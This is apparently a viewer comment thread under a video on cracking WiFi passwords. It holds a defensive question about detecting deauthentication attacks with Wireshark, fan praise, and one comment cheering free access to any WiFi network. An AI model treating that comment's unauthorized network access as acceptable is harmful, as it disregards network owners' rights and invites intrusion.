Is WPA3 or 5 GHz vulnerable also to this or easily cracked some other way? Also how can I use Wireshark to monitor for deauthentication packets and log them? Also is there any security software that would alert me if a deauthentication packet is sent so I might have time to change the password? Of course I am not sure if there is anything for the last one at least if there is I wouldn't expect it to be free. These questions (the ones that apply of course) are assuming that I can monitor and one of my old laptops I think has a card that can do it. All things mentioned are for my own network BTW. I found your video to be very well done.
Thank you very much ....this is my home .....I will forever rely on your videos
You are awesome ❤❤. I have watched many of your videos❤❤
Soooo helpful video take love from Bangladesh ❤️❤️❤️❤️🇧🇩🇧🇩🇧🇩🇧🇩
Sweet, I can have access to WiFi absolutely free anywhere now.
You are a legend in my friend group Mr.Bombal
nice video but lots of the time, the password used by people is the default password under the internet box. I reckon it's more difficult to crack than a "hello hello" password... What do you think?